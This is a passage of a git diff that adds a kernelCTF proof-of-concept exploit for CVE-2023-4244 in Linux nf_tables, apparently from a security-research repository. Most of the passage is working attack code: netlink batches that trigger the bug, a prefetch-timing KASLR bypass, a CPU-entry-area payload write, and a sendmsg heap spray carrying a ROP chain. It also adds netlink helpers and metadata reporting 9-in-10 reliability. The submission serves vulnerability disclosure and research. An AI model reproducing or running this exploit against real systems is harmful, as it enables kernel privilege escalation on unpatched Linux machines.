nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSETELEM, family, NLM_F_CREATE, seq++); + nftnl_set_elems_nlmsg_build_payload(nlh, set_elem_trigger); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELSET, family, 0, seq++); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } + + // wait for nft_commit_release() to complete + usleep(100*1000); + + del_chain(trig_chain_name); + + // wait for nft_commit_release() to complete + usleep(100*1000); +} + +void setup(){ + new_ns(); + + nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + err(1, "mnl_socket_open"); + } + + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror("mnl_socket_bind"); + exit(EXIT_FAILURE); + } + + portid = mnl_socket_get_portid(nl); +} + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { +uint64_t a, d; +asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); +a = (d<<32) | a; +return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { +uint64_t a, d; +asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); +a = (d<<32) | a; +return a; +} + +void prefetch(void* p) +{ +asm volatile ( + "prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r" (p)); +} + +size_t flushandreload(void* addr) // row miss +{ +size_t time = rdtsc_begin(); +prefetch(addr); +size_t delta = rdtsc_end() - time; +return delta; +} + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +int bypass_kaslr(uint64_t base) { + if (!base) { + #ifdef KASLR_BYPASS_INTEL + #define OFFSET 0 + #define START (0xffffffff81000000ull + OFFSET) + #define END (0xffffffffD0000000ull + OFFSET) + #define STEP 0x0000000001000000ull + while (1) { + uint64_t bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } + #else + #define START (0xffffffff81000000ull) + #define END (0xffffffffc0000000ull) + #define STEP 0x0000000000200000ull + #define NUM_TRIALS 7 + // largest contiguous mapped area at the beginning of _stext + #define WINDOW_SIZE 11 + + while (1) { + uint64_t bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } + #endif + } + +got_base: + printf("using kernel base %llx\n", base); + + kbase = base; + + return 0; +} + +static void sig_handler(int s) {} + +static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) { +asm volatile ( + "mov %0, %%rsp\n" + "pop %%r15\n" + "pop %%r14\n" + "pop %%r13\n" + "pop %%r12\n" + "pop %%rbp\n" + "pop %%rbx\n" + "pop %%r11\n" + "pop %%r10\n" + "pop %%r9\n" + "pop %%r8\n" + "pop %%rax\n" + "pop %%rcx\n" + "pop %%rdx\n" + "pop %%rsi\n" + "pop %%rdi\n" + "divq (0x1234000)\n" + "1:\n" + "jmp 1b\n" + : : "r"(payload) +); +__builtin_unreachable(); +} + +// Fill the CPU entry area exception stack of HELPER_CPU with a +// struct cpu_entry_area_payload +static void setup_cpu_entry_area() { +if (fork()) { + return; +} + +struct cpu_entry_area_payload payload = {}; +payload.nft_expr_eval = kbase + PUSH_RBX_POP_RSP; + +set_affinity(1); +signal(SIGFPE, sig_handler); +signal(SIGTRAP, sig_handler); +signal(SIGSEGV, sig_handler); +setsid(); + +write_cpu_entry_area(&payload); +} + +#define MSG_SIZE 0x2010 + +void spray_sendmsg() { + char buf[MSG_SIZE]; + struct msghdr msg = {0}; + struct sockaddr_in addr = {0}; + int sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + rop_chain((uint64_t*) buf); + + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + addr.sin_family = AF_INET; + addr.sin_port = htons(6666); + + msg.msg_control = buf; + msg.msg_controllen = MSG_SIZE; + msg.msg_name = (caddr_t)&addr; + msg.msg_namelen = sizeof(addr); + + set_affinity(0); + + sendmsg(sockfd, &msg, 0); +} + +void start(){ + save_state(); + + bypass_kaslr(0); + + setup_cpu_entry_area(); + + set_affinity(0); + + buf = malloc(BUF_SIZE); + + while(1){ + setup(); + + setup_table_chain(); + + trigger(set_rop_name, chain_rop_name); + + spray_sendmsg(); + + trig_sock(); + } +} + +int main(int argc, char ** argv) +{ + start(); + + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/netlink_utils.h b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/netlink_utils.h new file mode 100644 index 00000000..ce994bdf --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/netlink_utils.h @@ -0,0 +1,229 @@ +/* + * Utils used to communicate with the kernel via Netlink. + * Useful for static linking. + */ + +#include +#include +#include +#include + +#define PAGE_SIZE 0x1000 +#define NL_AUTO_SEQ 0 +#define NL_AUTO_PID 0 + +void *nlmsg_tail(const struct nlmsghdr *msg) +{ + return (unsigned char *)msg + NLMSG_ALIGN(msg->nlmsg_len); +} + +void *nlmsg_data(const struct nlmsghdr *msg) +{ + return NLMSG_DATA(msg); +} + +int nlmsg_datalen(const struct nlmsghdr *msg) +{ + return msg->nlmsg_len - NLMSG_HDRLEN; +} + +struct nlmsghdr *nlmsg_alloc(void) +{ + struct nlmsghdr *msg; + + msg = calloc(1, 0x1000); + if (!msg) + return NULL; + + msg->nlmsg_len = NLMSG_ALIGN(NLMSG_LENGTH(0)); + return msg; +} + +struct nlmsghdr *nlmsg_init(int type, int flags) +{ + struct nlmsghdr *msg; + + msg = nlmsg_alloc(); + if (!msg) + return NULL; + + msg->nlmsg_type = type; + msg->nlmsg_flags = flags; + msg->nlmsg_seq = NL_AUTO_SEQ; + msg->nlmsg_pid = NL_AUTO_PID; + + return msg; +} + +void nlmsg_free(struct nlmsghdr *msg) +{ + free(msg); +} + +int nl_init_request(int type, struct nlmsghdr **msg, int flags) +{ + int sk; + struct nlmsghdr *n; + + sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sk < 0) + return -1; + + n = nlmsg_init(type, flags); + if (!n) { + close(sk); + return -1; + } + + *msg = n; + return sk; +} + +void *nlmsg_reserve(struct nlmsghdr *msg, size_t len, int pad) +{ + char *data = (char *)msg; + size_t tlen; + + tlen = NLMSG_ALIGN(len); + data += msg->nlmsg_len; + msg->nlmsg_len += tlen; + + if (tlen > len) + memset(data + len, 0, tlen - len); + + return data; +} + +int nlmsg_append(struct nlmsghdr *msg, void *data, size_t len, int pad) +{ + void *tmp; + + tmp = nlmsg_reserve(msg, len, pad); + if (tmp == NULL) + return -1; + + memcpy(tmp, data, len); + return 0; +} + +int nl_sendmsg(int sk, struct nlmsghdr *msg) +{ + struct iovec iov = {}; + struct msghdr hdr = {}; + + if (sk < 0) + return -1; + + iov.iov_base = (void *)msg; + /* + * Here add NLMSG_GOODSIZE (0xec0) to the total message length + * to be sure the msg in netlink_alloc_large_skb() is allocated using vmalloc(): + * https://elixir.bootlin.com/linux/v6.1/source/net/netlink/af_netlink.c#L1190 + * Useful to reduce noise in kmalloc-512 slabs. + */ + iov.iov_len = msg->nlmsg_len + 0xec0; + + hdr.msg_name = NULL; + hdr.msg_namelen = sizeof(struct sockaddr_nl); + hdr.msg_iov = &iov; + hdr.msg_iovlen = 1; + + return sendmsg(sk, &hdr, 0); +} + +int nl_complete_request(int sock, struct nlmsghdr *msg) +{ + int ret; + + ret = nl_sendmsg(sock, msg); + nlmsg_free(msg); + close(sock); + + return ret; +} + +void *nla_data(const struct nlattr *nla) +{ + return (char *)nla + NLA_HDRLEN; +} + +int nla_attr_size(int payload) +{ + return NLA_HDRLEN + payload; +} + +int nla_total_size(int payload) +{ + return NLA_ALIGN(nla_attr_size(payload)); +} + +int nla_padlen(int payload) +{ + return nla_total_size(payload) - nla_attr_size(payload); +} + +struct nlattr *nla_reserve(struct nlmsghdr *msg, int attrtype, int attrlen) +{ + struct nlattr *nla; + + nla = (struct nlattr *)nlmsg_tail(msg); + nla->nla_type = attrtype; + nla->nla_len = nla_attr_size(attrlen); + + memset((unsigned char *) nla + nla->nla_len, 0, nla_padlen(attrlen)); + + msg->nlmsg_len = NLMSG_ALIGN(msg->nlmsg_len) + nla_total_size(attrlen); + return nla; +} + +int nla_put(struct nlmsghdr *msg, int attrtype, int datalen, const void *data) +{ + struct nlattr *nla; + + nla = nla_reserve(msg, attrtype, datalen); + if (!nla) + return -1; + + memcpy(nla_data(nla), data, datalen); + return 0; +} + +int nla_put_u32(struct nlmsghdr *msg, int attrtype, uint32_t value) +{ + return nla_put(msg, attrtype, sizeof(uint32_t), &value); +} + +int nla_put_string(struct nlmsghdr *msg, int attrtype, const char *str) +{ + return nla_put(msg, attrtype, strlen(str) + 1, str); +} + +int nla_put_nested(struct nlmsghdr *msg, int attrtype, const struct nlmsghdr *nested) +{ + return nla_put(msg, attrtype, nlmsg_datalen(nested), nlmsg_data(nested)); +} + +struct nlattr *nla_nest_start(struct nlmsghdr *msg, int attrtype) +{ + struct nlattr *start = (struct nlattr *)nlmsg_tail(msg); + + if (nla_put(msg, NLA_F_NESTED | attrtype, 0, NULL) < 0) + return NULL; + + return start; +} + +int nla_nest_end(struct nlmsghdr *msg, struct nlattr *start) +{ + size_t pad, len; + + len = (char *)nlmsg_tail(msg) - (char *)start; + start->nla_len = len; + + pad = NLMSG_ALIGN(msg->nlmsg_len) - msg->nlmsg_len; + if (pad > 0) { + if (!nlmsg_reserve(msg, pad, 0)) + return -1; + } + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/metadata.json new file mode 100644 index 00000000..2c233d9d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/metadata.json @@ -0,0 +1,34 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp190" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26", + "cve": "CVE-2023-4244", + "affected_versions": [ + "6.4 - 6.5-rc5" + ], + "requirements": { + "attack_surface": [ + "userns" + ], + "capabilities": [ + "CAP_NET_ADMIN" + ], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_NF_TABLES" + ] + } + }, + "exploits": { + "mitigation-v3-6.1.55": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "9 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/original.tar.gz new file mode 100644 index 00000000..755b68b6 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/original.tar.gz differ